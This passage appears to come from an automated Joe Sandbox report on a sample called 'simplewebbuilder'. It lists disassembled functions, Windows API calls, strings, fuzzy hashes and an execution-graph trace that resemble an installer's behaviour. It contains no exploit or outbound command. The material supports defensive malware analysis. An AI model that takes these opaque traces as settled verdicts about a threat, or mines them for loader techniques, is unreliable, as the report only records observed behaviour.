                                                                                                                            • Instruction ID: b292e2af1b97ad2e41c61b7a1577e946bcd6c9bf1fe3ec6cde6a8d59625b3480
                                                                                                                            • Opcode Fuzzy Hash: 7498f3fdf828b49147973583c797bd6db621dcbd59e2b5bf303044eff28c57af
                                                                                                                            • Instruction Fuzzy Hash: A2210170D052089ADB14EFE8D951BEEBBB8EF80314F04811DF909AB391DFB05A04CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B5461 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 009B5471
                                                                                                                              • Part of subcall function 009C35AC: __FF_MSGBANNER.LIBCMT ref: 009C35C3
                                                                                                                              • Part of subcall function 009C35AC: __NMSG_WRITE.LIBCMT ref: 009C35CA
                                                                                                                              • Part of subcall function 009C35AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 009C35EF
                                                                                                                            • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 009B5483
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                                                                            • String ID: \save.dat
                                                                                                                            • API String ID: 4128168839-3580179773
                                                                                                                            • Opcode ID: f44aa84d608fe26621d2ee4b5771b99d7ceecb418d2c4054fd9f88319b1ac62e
                                                                                                                            • Instruction ID: d59e0574f9544d891c0111fe3ac9be02b5b2ccaa600d0e4478fa272a67058292
                                                                                                                            • Opcode Fuzzy Hash: f44aa84d608fe26621d2ee4b5771b99d7ceecb418d2c4054fd9f88319b1ac62e
                                                                                                                            • Instruction Fuzzy Hash: FA1190329096413BDB259F65CD81FEFBF6BDFC2760B1581ADF8455B202D5720E42C6A0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B3965 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B396A
                                                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 009B39C1
                                                                                                                              • Part of subcall function 009B1410: std::exception::exception.LIBCMT ref: 009B1428
                                                                                                                              • Part of subcall function 009BAC14: __EH_prolog.LIBCMT ref: 009BAC19
                                                                                                                              • Part of subcall function 009BAC14: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009BAC28
                                                                                                                              • Part of subcall function 009BAC14: __CxxThrowException@8.LIBCMT ref: 009BAC47
                                                                                                                            Strings
                                                                                                                            • Day of month is not valid for year, xrefs: 009B39AC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                            • String ID: Day of month is not valid for year
                                                                                                                            • API String ID: 1404951899-1521898139
                                                                                                                            • Opcode ID: 6afaa85bb686a2c56dbe474af92bf8504d889fc6572684180b0d46e6e73f1fe8
                                                                                                                            • Instruction ID: b0486f97807d35a64a77284e2746444d210c26cf54a277bcf952a021df36b3c6
                                                                                                                            • Opcode Fuzzy Hash: 6afaa85bb686a2c56dbe474af92bf8504d889fc6572684180b0d46e6e73f1fe8
                                                                                                                            • Instruction Fuzzy Hash: 5001B176914209EACF04EFA4D902AEEBBB9FF98720F40851BF81093300EB744A55C7A5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009BB6F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 009C010D
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 009C0122
                                                                                                                              • Part of subcall function 009C414C: _malloc.LIBCMT ref: 009C4164
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                            • String ID: bad allocation
                                                                                                                            • API String ID: 4063778783-2104205924
                                                                                                                            • Opcode ID: 75031b50ee28827a87dd74d6b204a3ea5dca3877e4793593c5ceb873dbb55fda
                                                                                                                            • Instruction ID: 465a3fc0647f18e844fd9e5445df4218b2415d0e626506a03238affdba8e004b
                                                                                                                            • Opcode Fuzzy Hash: 75031b50ee28827a87dd74d6b204a3ea5dca3877e4793593c5ceb873dbb55fda
                                                                                                                            • Instruction Fuzzy Hash: 75F0AE70A44309979F14FA988856FEF73EC9B44314F500519B415D3AC1EFB0E900C2A5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B3C16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B3C1B
                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 009B3C30
                                                                                                                              • Part of subcall function 009C2AB7: std::exception::exception.LIBCMT ref: 009C2AC1
                                                                                                                              • Part of subcall function 009BAC4D: __EH_prolog.LIBCMT ref: 009BAC52
                                                                                                                              • Part of subcall function 009BAC4D: __CxxThrowException@8.LIBCMT ref: 009BAC7B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                            • String ID: bad cast
                                                                                                                            • API String ID: 1300498068-3145022300
                                                                                                                            • Opcode ID: c0ed64162976b0ad1666d9c9feb6d8a1876fce47d8d10449e3a2f2fd8698c647
                                                                                                                            • Instruction ID: 22a42e1f17d3f94a66c9aaa26463b8366cc67f28a5cbb52e5d159cf7db0eb0d2
                                                                                                                            • Opcode Fuzzy Hash: c0ed64162976b0ad1666d9c9feb6d8a1876fce47d8d10449e3a2f2fd8698c647
                                                                                                                            • Instruction Fuzzy Hash: E2F0A732940504CBC719EF54D541BDABB78EF96321F00816EFD055B351CBB29A05C791
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B3881 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B3886
                                                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 009B38A5
                                                                                                                              • Part of subcall function 009B1410: std::exception::exception.LIBCMT ref: 009B1428
                                                                                                                              • Part of subcall function 009B8F82: _memmove.LIBCMT ref: 009B8FA2
                                                                                                                            Strings
                                                                                                                            • Day of month value is out of range 1..31, xrefs: 009B3894
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                            • String ID: Day of month value is out of range 1..31
                                                                                                                            • API String ID: 3258419250-1361117730
                                                                                                                            • Opcode ID: 6d83bc1cc12e6c89a1d33ba70c53521d237c97f729a302ce74bc86b9af2ecb8d
                                                                                                                            • Instruction ID: d0253ade590db44a47d61e60370cb78383534c7788dcd158a3225b6dcc3ee108
                                                                                                                            • Opcode Fuzzy Hash: 6d83bc1cc12e6c89a1d33ba70c53521d237c97f729a302ce74bc86b9af2ecb8d
                                                                                                                            • Instruction Fuzzy Hash: E4E0D832A842049BC728BF94C9127EDB7B8DB48B24F40855FF40167381DEB12944C7D0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B38CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B38D2
                                                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 009B38F1
                                                                                                                              • Part of subcall function 009B1410: std::exception::exception.LIBCMT ref: 009B1428
                                                                                                                              • Part of subcall function 009B8F82: _memmove.LIBCMT ref: 009B8FA2
                                                                                                                            Strings
                                                                                                                            • Year is out of valid range: 1400..10000, xrefs: 009B38E0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                            • String ID: Year is out of valid range: 1400..10000
                                                                                                                            • API String ID: 3258419250-2344417016
                                                                                                                            • Opcode ID: b7d2fbde3d8cfee26b661076f69e5e7a19986e9fc47fa717ad3f0d5526a018c5
                                                                                                                            • Instruction ID: 35b1364fa7f8e3aaedefb420775fb42e1ef8f40ef1fb22fa8ff42d008962b2b9
                                                                                                                            • Opcode Fuzzy Hash: b7d2fbde3d8cfee26b661076f69e5e7a19986e9fc47fa717ad3f0d5526a018c5
                                                                                                                            • Instruction Fuzzy Hash: A7E09232A8421497C728FB9489527EDB7A8DB4CB20F00455BF401673C1DAB12944C790
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B3919 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B391E
                                                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 009B393D
                                                                                                                              • Part of subcall function 009B1410: std::exception::exception.LIBCMT ref: 009B1428
                                                                                                                              • Part of subcall function 009B8F82: _memmove.LIBCMT ref: 009B8FA2
                                                                                                                            Strings
                                                                                                                            • Month number is out of range 1..12, xrefs: 009B392C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                            • String ID: Month number is out of range 1..12
                                                                                                                            • API String ID: 3258419250-4198407886
                                                                                                                            • Opcode ID: 69ea93efb6573f9d6ca7f715baccece87edc2c5fe5a26876b2e959d847efcd1c
                                                                                                                            • Instruction ID: cc5f6654fd2fb28b5e0a97df4a1aa07a515eaee112a997ee4234c4083128251a
                                                                                                                            • Opcode Fuzzy Hash: 69ea93efb6573f9d6ca7f715baccece87edc2c5fe5a26876b2e959d847efcd1c
                                                                                                                            • Instruction Fuzzy Hash: 8AE0D832A842049BC728BB94C9127EDB7B8DF48B20F00455FF80167381DEF12944C7D1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B19C2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • TlsAlloc.KERNEL32 ref: 009B19CC
                                                                                                                            • GetLastError.KERNEL32 ref: 009B19D9
                                                                                                                              • Part of subcall function 009B1712: __EH_prolog.LIBCMT ref: 009B1717
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocErrorH_prologLast
                                                                                                                            • String ID: tss
                                                                                                                            • API String ID: 249634027-1638339373
                                                                                                                            • Opcode ID: 60fc00f971304cb9838920b848c7ffb86a9c4e4006143899e4e7b4dced6970d3
                                                                                                                            • Instruction ID: a5b1b8df1821102690d7fb8594968cf0ea7132021cdad87ad1fe67fd01c07854
                                                                                                                            • Opcode Fuzzy Hash: 60fc00f971304cb9838920b848c7ffb86a9c4e4006143899e4e7b4dced6970d3
                                                                                                                            • Instruction Fuzzy Hash: D4E08631D596145BC3107B78EC094DBBBA49A85274F10872BFDA9832D1EE30995497C6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B3BD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B3BD8
                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 009B3BED
                                                                                                                              • Part of subcall function 009C2AB7: std::exception::exception.LIBCMT ref: 009C2AC1
                                                                                                                              • Part of subcall function 009BAC4D: __EH_prolog.LIBCMT ref: 009BAC52
                                                                                                                              • Part of subcall function 009BAC4D: __CxxThrowException@8.LIBCMT ref: 009BAC7B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                            • String ID: bad cast
                                                                                                                            • API String ID: 1300498068-3145022300
                                                                                                                            • Opcode ID: ca5bbce6f22d4d711e1cf1b14c4c5e265a7ef5ed00898ad615f9fba98ae6ac6a
                                                                                                                            • Instruction ID: 1955138562f235c3225e9805d067747d2c08da25db1492fd97bcaad474d1d066
                                                                                                                            • Opcode Fuzzy Hash: ca5bbce6f22d4d711e1cf1b14c4c5e265a7ef5ed00898ad615f9fba98ae6ac6a
                                                                                                                            • Instruction Fuzzy Hash: F3E09231940208DBC718EF58E642BA8BBB8EBA5310F00C1AEE80257391CB714A04CA82
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403B4C Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403B74
                                                                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BA8
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BC2
                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BD9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocHeap$FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3499195154-0
                                                                                                                            • Opcode ID: 3d2489dfb7edba8101981c13f95fc6febc3da7b0dfed5f0ee755b7708c58c99a
                                                                                                                            • Instruction ID: fcdd260894a6eddc8adf86aaa2b40ca1807c17f8388b21482d04f48ace73d9e8
                                                                                                                            • Opcode Fuzzy Hash: 3d2489dfb7edba8101981c13f95fc6febc3da7b0dfed5f0ee755b7708c58c99a
                                                                                                                            • Instruction Fuzzy Hash: 1B111630300206DFD720CF28EE85A227BB6FB897557104B39E592E69A1D771A945CF18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:16.8%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:5%
                                                                                                                            Total number of Nodes:1282
                                                                                                                            Total number of Limit Nodes:21
                                                                                                                            execution_graph 3350 403141 3353 407c08 3350->3353 3354 403155 FindCloseChangeNotification 3353->3354 3910 402541 3911 401456 18 API calls 3910->3911 3912 40254d 3911->3912 3913 401456 18 API calls 3912->3913 3914 40255c 3913->3914 3915 402578 EnableWindow 3914->3915 3916 40256d ShowWindow 3914->3916 3917 4037d4 3915->3917 3916->3917 3918 401e43 3919 401456 18 API calls 3918->3919 3920 401e4f 3919->3920 3921 401456 18 API calls 3920->3921 3922 401e5e 3921->3922 3923 401400 18 API calls 3922->3923 3924 401e71 3923->3924 3929 401ee6 3924->3929 3931 407cde lstrlenA 3924->3931 3932 408d43 3936 408a96 3932->3936 3933 408cf0 3934 408b69 GlobalAlloc 3934->3933 3934->3936 3935 408b4d GlobalFree 3935->3934 3936->3933 3936->3934 3936->3935 3937 408c55 GlobalAlloc 3936->3937 3938 408c45 GlobalFree 3936->3938 3937->3933 3937->3936 3938->3937 3939 405c44 3940 405c8f 3939->3940 3941 405c6f 3939->3941 3943 405c9c GetDlgItem 3940->3943 3946 405d60 3940->3946 4004 407805 GetDlgItemTextA 3941->4004 3945 405cbc 3943->3945 3944 405c7f 3947 407d37 5 API calls 3944->3947 3951 405cd7 SetWindowTextA 3945->3951 3956 407935 3 API calls 3945->3956 3948 405c89 3946->3948 3953 407e06 18 API calls 3946->3953 3947->3948 3949 4060cd 3948->3949 4010 407805 GetDlgItemTextA 3948->4010 4028 404f0f 3949->4028 4005 404d65 3951->4005 3958 405dd9 SHBrowseForFolderA 3953->3958 3954 405eb6 3959 40815b 17 API calls 3954->3959 3961 405cc9 3956->3961 3958->3948 3963 405dfa CoTaskMemFree 3958->3963 3964 405ec0 3959->3964 3961->3951 3968 407cf2 3 API calls 3961->3968 3966 407cf2 3 API calls 3963->3966 4011 407cb6 lstrcpynA 3964->4011 3970 405e0c 3966->3970 3972 405cd6 3968->3972 3974 405e65 3970->3974 3978 407e06 18 API calls 3970->3978 3971 405edb 3975 408299 5 API calls 3971->3975 3972->3951 4009 4077fb SetDlgItemTextA 3974->4009 3983 405ee9 3975->3983 3979 405e34 lstrcmpiA 3978->3979 3979->3974 3981 405e51 3979->3981 3980 405ef2 4012 407cb6 lstrcpynA 3980->4012 4008 407ce8 lstrcatA 3981->4008 3983->3980 3989 4078ce 2 API calls 3983->3989 3991 405f45 3983->3991 3985 405f02 3986 407935 3 API calls 3985->3986 3987 405f10 GetDiskFreeSpaceA 3986->3987 3990 405fb9 MulDiv 3987->3990 3987->3991 3989->3983 3990->3991 3992 406060 3991->3992 4013 404da2 3991->4013 3994 406099 3992->3994 3995 403903 2 API calls 3992->3995 4026 404d44 EnableWindow 3994->4026 3995->3994 3998 4060ba 3998->3949 4027 404d05 SendMessageA 3998->4027 4004->3944 4006 407e06 18 API calls 4005->4006 4007 404d8c 4006->4007 4010->3954 4011->3971 4012->3985 4014 404db5 4013->4014 4015 407e06 18 API calls 4014->4015 4016 404e3c 4015->4016 4017 407e06 18 API calls 4016->4017 4018 404e51 4017->4018 4019 407e06 18 API calls 4018->4019 4020 404e65 4019->4020 4042 407cde lstrlenA 4020->4042 4026->3998 4027->3949 4029 404f27 4028->4029 4030 404f2e GetWindowLongA 4028->4030 4030->4029 4031 404f4a 4030->4031 4032 404f52 GetSysColor 4031->4032 4033 404f5c 4031->4033 4032->4033 4034 404f71 SetBkMode 4033->4034 4035 404f62 SetTextColor 4033->4035 4036 404f9c 4034->4036 4037 404f8f GetSysColor 4034->4037 4035->4034 4038 404fa2 SetBkColor 4036->4038 4039 404fb4 4036->4039 4037->4036 4038->4039 4039->4029 4040 404fd1 CreateBrushIndirect 4039->4040 4041 404fc7 DeleteObject 4039->4041 4040->4029 4041->4040 4043 403747 4044 401456 18 API calls 4043->4044 4047 4036cd 4044->4047 4045 4037a0 4046 407e06 18 API calls 4045->4046 4048 402a3c 4045->4048 4046->4048 4047->4043 4047->4045 4047->4048 4049 404ec8 lstrcpynA 4052 407cde lstrlenA 4049->4052 4053 4023c9 GetDlgItem GetClientRect 4054 401400 18 API calls 4053->4054 4055 402419 LoadImageA SendMessageA 4054->4055 4056 40246e DeleteObject 4055->4056 4057 40382f 4055->4057 4056->4057 3876 402e4b 3877 402e51 3876->3877 3878 401400 18 API calls 3877->3878 3879 402e74 3878->3879 3880 401400 18 API calls 3879->3880 3881 402e87 RegCreateKeyExA 3880->3881 3882 402ee4 3881->3882 3885 403677 3881->3885 3883 402f06 3882->3883 3884 402ee9 3882->3884 3887 402f24 3883->3887 3888 402f0b 3883->3888 3886 401400 18 API calls 3884->3886 3889 402ef5 3886->3889 3891 402f54 RegSetValueExA 3887->3891 3895 403d52 46 API calls 3887->3895 3897 401456 3888->3897 3896 407cde lstrlenA 3889->3896 3892 40307b RegCloseKey 3891->3892 3892->3885 3894 402f02 3894->3891 3895->3894 3898 407e06 18 API calls 3897->3898 3899 401477 3898->3899 4058 404a4c 4059 404a5e 4058->4059 4060 404a68 GlobalAlloc 4059->4060 4061 404a86 4059->4061 4060->4061 4062 4033cf FindClose 4063 401f51 4064 401400 18 API calls 4063->4064 4065 401f5d ExpandEnvironmentStringsA 4064->4065 4066 401f8a 4065->4066 4068 401f7c 4065->4068 4067 401f97 lstrcmpA 4066->4067 4066->4068 4067->4068 4069 4026d3 4070 401400 18 API calls 4069->4070 4071 4026df 4070->4071 4072 408123 2 API calls 4071->4072 4073 4026e8 4072->4073 4075 402704 4073->4075 4076 407be3 wsprintfA 4073->4076 4076->4075 4077 4016d4 4078 401cc4 4077->4078 4079 406fcb 23 API calls 4078->4079 4080 401cc9 4079->4080 4081 402bd6 4082 401400 18 API calls 4081->4082 4083 402be2 4082->4083 4084 401400 18 API calls 4083->4084 4085 402bf1 4084->4085 4086 401400 18 API calls 4085->4086 4087 402c00 4086->4087 4088 408123 2 API calls 4087->4088 4089 402c0b 4088->4089 4090 402c8d 4089->4090 4099 407cde lstrlenA 4089->4099 4091 406fcb 23 API calls 4090->4091 4097 402ca1 4091->4097 4107 406ed7 4108 406ef1 4107->4108 4109 406f0b 4107->4109 4108->4109 4110 406ef7 4108->4110 4111 406f13 IsWindowVisible 4109->4111 4112 406f31 4109->4112 4115 404bd7 SendMessageA 4110->4115 4113 406f21 4111->4113 4114 406f9d CallWindowProcA 4111->4114 4112->4114 4129 407cb6 lstrcpynA 4112->4129 4126 406557 SendMessageA 4113->4126 4117 406f03 4114->4117 4115->4117 4119 406f66 4130 407be3 wsprintfA 4119->4130 4121 406f78 4122 403903 2 API calls 4121->4122 4123 406f86 4122->4123 4131 407cb6 lstrcpynA 4123->4131 4125 406f9b 4125->4114 4127 4065db 4126->4127 4128 406595 GetMessagePos ScreenToClient SendMessageA 4126->4128 4127->4112 4128->4127 4129->4119 4130->4121 4131->4125 4132 4037d8 SendMessageA 4133 40380d InvalidateRect 4132->4133 4134 40382c 4132->4134 4133->4134 4142 40395e 4143 403973 SetTimer 4142->4143 4144 403999 4142->4144 4143->4144 4145 4039f0 4144->4145 4149 40392c MulDiv 4144->4149 4147 4039a5 wsprintfA SetWindowTextA 4150 4077fb SetDlgItemTextA 4147->4150 4149->4147 3221 402860 3222 402869 3221->3222 3223 402970 3221->3223 3240 401400 3222->3240 3225 40163b 23 API calls 3223->3225 3227 402a3b 3225->3227 3228 401400 18 API calls 3229 402884 3228->3229 3230 402890 LoadLibraryExA 3229->3230 3231 4028b8 GetModuleHandleA 3229->3231 3230->3223 3232 4028b6 3230->3232 3231->3230 3233 4028c8 GetProcAddress 3231->3233 3232->3233 3234 40292d 3233->3234 3235 4028dd 3233->3235 3248 406fcb 3234->3248 3238 4028ef 3235->3238 3245 40163b 3235->3245 3238->3227 3239 402962 FreeLibrary 3238->3239 3239->3227 3262 407e06 3240->3262 3243 40144b 3243->3228 3246 406fcb 23 API calls 3245->3246 3247 401654 3246->3247 3247->3238 3249 4070f3 3248->3249 3250 406fe2 3248->3250 3249->3238 3251 407002 3250->3251 3252 407e06 18 API calls 3250->3252 3303 407cde lstrlenA 3251->3303 3252->3251 3274 407e16 3262->3274 3263 407ef9 3264 40143a 3263->3264 3291 407cb6 lstrcpynA 3263->3291 3264->3243 3281 407d37 3264->3281 3266 407f25 GetVersion 3275 407f34 3266->3275 3267 407ee3 lstrlenA 3267->3274 3271 407fbb GetSystemDirectoryA 3271->3275 3272 407e06 11 API calls 3272->3274 3273 407fe1 GetWindowsDirectoryA 3273->3275 3274->3263 3274->3266 3274->3267 3274->3272 3276 407d37 5 API calls 3274->3276 3290 407be3 wsprintfA 3274->3290 3297 407cb6 lstrcpynA 3274->3297 3298 407ce8 lstrcatA 3274->3298 3275->3271 3275->3273 3275->3274 3277 407e06 11 API calls 3275->3277 3278 408002 SHGetSpecialFolderLocation 3275->3278 3292 407b3a RegOpenKeyExA 3275->3292 3276->3274 3277->3275 3278->3275 3279 408069 SHGetPathFromIDListA CoTaskMemFree 3278->3279 3279->3275 3283 407d48 3281->3283 3282 407dd5 3284 407dde CharPrevA 3282->3284 3285 407dfc 3282->3285 3283->3282 3286 407dc7 CharNextA 3283->3286 3288 407d9c CharNextA 3283->3288 3289 407db8 CharNextA 3283->3289 3299 4078a4 3283->3299 3284->3282 3285->3243 3286->3283 3288->3283 3289->3286 3290->3274 3291->3264 3293 407b81 RegQueryValueExA 3292->3293 3294 407bdc 3292->3294 3295 407bbc RegCloseKey 3293->3295 3294->3275 3295->3294 3297->3274 3300 4078b1 3299->3300 3301 4078c7 3300->3301 3302 4078bb CharNextA 3300->3302 3301->3283 3302->3300 3304 401860 3305 401400 18 API calls 3304->3305 3306 40186c 3305->3306 3323 407935 CharNextA CharNextA 3306->3323 3308 401902 3309 401942 3308->3309 3310 40190e 3308->3310 3314 40163b 23 API calls 3309->3314 3319 403677 3309->3319 3312 40163b 23 API calls 3310->3312 3311 4078a4 CharNextA 3322 401879 3311->3322 3313 40191a 3312->3313 3340 407cb6 lstrcpynA 3313->3340 3314->3319 3318 40192b SetCurrentDirectoryA 3318->3319 3320 4018dd GetFileAttributesA 3320->3322 3322->3308 3322->3311 3322->3320 3329 4082eb 3322->3329 3332 4076b0 CreateDirectoryA 3322->3332 3337 40774b CreateDirectoryA 3322->3337 3324 40795a 3323->3324 3325 407976 3324->3325 3326 4078a4 CharNextA 3324->3326 3325->3322 3327 40798a 3326->3327 3327->3325 3328 4078a4 CharNextA 3327->3328 3328->3325 3341 408299 GetModuleHandleA 3329->3341 3333 407710 3332->3333 3334 407714 GetLastError 3332->3334 3333->3322 3334->3333 3335 407723 SetFileSecurityA 3334->3335 3335->3333 3336 40773f GetLastError 3335->3336 3336->3333 3338 407775 3337->3338 3339 40776f GetLastError 3337->3339 3338->3322 3339->3338 3340->3318 3342 4082bb 3341->3342 3343 4082cc GetProcAddress 3341->3343 3347 40820e GetSystemDirectoryA 3342->3347 3344 4082e2 3343->3344 3344->3322 3346 4082c3 3346->3343 3346->3344 3348 40823c wsprintfA LoadLibraryExA 3347->3348 3348->3346 4151 4020e0 4152 40216e 4151->4152 4158 4020f0 4151->4158 4153 4021a1 GlobalAlloc 4152->4153 4154 402172 4152->4154 4156 407e06 18 API calls 4153->4156 4169 402127 4154->4169 4172 407cb6 lstrcpynA 4154->4172 4155 402101 4159 407e06 18 API calls 4155->4159 4156->4169 4158->4155 4161 40212e 4158->4161 4162 402115 4159->4162 4160 402189 GlobalFree 4160->4169 4170 407cb6 lstrcpynA 4161->4170 4165 407836 MessageBoxIndirectA 4162->4165 4164 402141 4171 407cb6 lstrcpynA 4164->4171 4165->4169 4167 402157 4173 407cb6 lstrcpynA 4167->4173 4170->4164 4171->4167 4172->4160 